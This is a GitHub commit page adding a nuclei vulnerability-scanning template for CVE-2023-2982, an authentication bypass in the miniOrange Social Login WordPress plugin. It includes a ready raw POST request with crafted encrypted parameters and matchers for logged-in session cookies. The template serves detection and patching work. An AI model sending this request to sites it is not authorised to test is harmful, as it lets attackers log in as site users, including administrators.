Skip to content

Commit

Permalink
Merge pull request #7576 from projectdiscovery/CVE-2023-2982
Browse files Browse the repository at this point in the history
Create CVE-2023-2982.yaml
  • Loading branch information
DhiyaneshGeek committed Jul 10, 2023
2 parents 7219ee5 + 955d244 commit 4ca99ac
Showing 1 changed file with 41 additions and 0 deletions.
41 changes: 41 additions & 0 deletions http/cves/2023/CVE-2023-2982.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
id: CVE-2023-2982

info:
name: Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass
author: ritikchaddha
severity: critical
description: |
The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.
remediation: Fixed in version 7.6.5
reference: |
- https://lana.codes/lanavdb/2326f41f-a39f-4fde-8627-9d29fff91443/
- https://wordpress.org/plugins/miniorange-login-openid/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2982
classification:
cve-id: CVE-2023-2982
metadata:
max-request: 1
verified: true
tags: cve,cve2023,wp,wordpress,wp-plugin,auth-bypass,miniorange

http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D
matchers-condition: and
matchers:
- type: word
part: set_cookie
words:
- "wordpress_sec_"
- "wordpress_logged_in_"
condition: or

- type: status
status:
- 302

0 comments on commit 4ca99ac

Please sign in to comment.